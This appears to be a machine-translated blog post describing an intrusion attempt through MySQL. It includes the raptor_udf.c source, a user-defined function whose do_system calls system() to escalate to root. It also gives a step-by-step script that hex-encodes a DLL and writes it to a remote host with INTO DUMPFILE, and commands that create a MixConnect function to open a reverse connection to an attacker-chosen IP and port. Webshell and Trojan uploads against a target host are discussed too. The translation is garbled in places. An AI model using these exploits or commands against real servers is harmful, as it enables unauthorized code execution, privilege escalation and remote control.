Upload and execute files with MySQL

I have always thought that using MySQL can only export WebShell, but there is no intention to find an article for a while "Windows Enforce system commands with system commands", so I will continue to search for related articles.

The upload file uses the mysql command "SELECT * from Mix Into dumpfile 'c: //abc.dll';" (in the previous guide, I just use SELECT * from Tablename Into Outfile 'C: //abc.txt') I can't think of binary files.

As for the execution command, it is implemented with the custom process of MySQL. Checked down, a simple DLL that matches MySQL is the following format:

[code]

/ * * $ ID: RAPTOR_UDF.C, V 1.1 2004/12/04 14:44:39 RAPTOR EXP $ * * RAPTOR_UDF.C - Dynamic Library for do_system () mysql udf * copyright (c) 2004 marco ivaldi * * This is an helper dynamic library for local privilege escalation through * MySQL run 4.0.17 * * Code ripped with root privileges (very bad idea!) Tested on MySQL from:.. http: //www.ngssoftware .com / papers / HackproofingMySQL.pdf * * "MySQL provides a mechanism by which the default set of functions can be * expanded by means of custom written dynamic libraries containing User * Defined Functions, or UDFs" -. Hackproofing MySQL * * Usage : * $ ID * UID = 500 (raptor) GID = 500 (raptor) Groups = 500 (raptor) * $ gcc -g -c raptor_udf.c * $ gcc -g -shared -w1, -soname, raptor_udf.so - o Raptor_udf.so raptor_udf.o -lc * $ mysql -u root -p * Enter password: * [...] * mysql> use mysql; * mysql> create table foo (line blob); * mysql> Insert Into foo VALUES (Load_file ('/ home / raptor / raptor_udf.so')); * mysql> Select * from foo INTO DUMPFILE '/USR/LIB/RAPTOR_UDF.SO'; * mysql> create function do_system returns integer Soname 'raptor_udf.so'; * mysql> select * from mysql.func; * ---------- - ----- --------------- ---------- * | Name | RET | DL | TYPE | * --- -------- ----- -------------- ---------- * | do_system | 2 | raptor_udf. SO | Function | * ----------- ---- -------------------------- * Mysql> select do_system ('id> / tmp / out; chown raptor.raptor / tmp / out'); * mysql> /! Sh * sh-2.05b $ cat / tmp / out * uid = 0 (root) GID = 0 (root) groups =

0 (Root), 1 (BIN), 2 (DAEMON), 3 (Sys), 4 (ADM) * [...] * / # include #include

ENUM ITEM_RESULT {string_result, real_result, int_result, row_result};

typedef struct st_udf_args {unsigned int arg_count; // number of arguments enum Item_result * arg_type; // pointer to item_result char ** args; // pointer to arguments unsigned long * lengths; // length of string args char * maybe_null; // 1 for Maybe_null args} udf_args;

typedef struct st_udf_init {char maybe_null; // 1 if func can return NULL unsigned int decimals; // for real functions unsigned long max_length; // for string functions char * ptr; // free ptr for func data char const_item; // 0 If Result is constant} udf_init;

INT DO_SYSTEM (UDF_INIT * INITID, UDF_ARGS * ARGS, CHAR * IS_NULL, CHAR * Error) {IF (args-> arg_count! = 1) Return (0);

System (args-> args [0]);

Return (0);} [/ code]

Oh, it's so simple, (compiled under VC, it seems to be cl / ld abc.c, I am not familiar with VC, no way)

However, according to the online statement, it is necessary to go to the mysql table to create binary tables and exports to succeed, may not succeed in TEST.

But I have derived several times, or even the binary file will be missed, (some of which will mess with garbled).

Because I made a little error when I started, I used mySQL client to enter the mysql command prompt, paste the DLL file, but always paste it, so the file is not complete. This problem has been bothering me for a long time, because even if the buffer size of the Console window that modifies Windows is not, then even think of using FTERM through the mysql client under Linux, the result is also failed. In the end, I found that myself is how stupid. In fact, MySQL is the function of importing mySQL command, that is, I can use mysql -u root -h hostname -p

First, the new file script.txt, the content is as follows

Use mysql; drop table if exissrs mix; create table mix (data longblob); set @ a = // Here you open first, wait for the contents to come over Insert Into Mix Values; SELECT * FROM Mix Into Dumpfile 'distant directory and file name, pay attention to / escape path; DROP TABLE MIX; Second, use WinHex to open the file you want to upload, then Copy All -> HEX Value, paste to the set @ a = back This becomes a definition of a variable @a, the value is the value of that file.

Third, execute mysql -u root -h remote host -p

The step of exporting the DLL and the execution is description. http://blog.donews.com/swap/archive/2005/12/10/652990.aspx

First, use the above way to export a mix.dll (Mix.dll yourself)

Second, Create Function Mixconnect Returns String Soname 'C: //Mix.dll'; / * Note Modify the file address Select MixConnect ('127.0.0.1', '886'); / * Note Modify the IP address and port of the reverse connected number

PS: Originally uploading WebShell is not needed to use so trouble, but just test target host web user has no permissions, the code for uploading files is unsuccessful, although a word Trojan, but actually can't be executed, it originally PHP The upload file function is not available (it is estimated that the administrator is not set up after the authority has changed, causing no permission to write the file back to the Web directory after the uploading to the temporary directory. Directly guide the other little bit of Trojan, it seems to be one The escape character that hits Chinese or single quotes or "/" will be wrong, causing the exported Trojan that cannot be executed. It is difficult to export a servu's local proposed PHP file, which seems to be executed, but there is no effect. Later, it was estimated that it was changed when it was exported. Web user is not written, but servu proposal is very smooth. Finally, I have learned the knowledge about MySQL intrusion. But I can't think of the Why is this code that can only Dir C:, one to DIR C: / INETPUB is not good, but actually there is permission to read.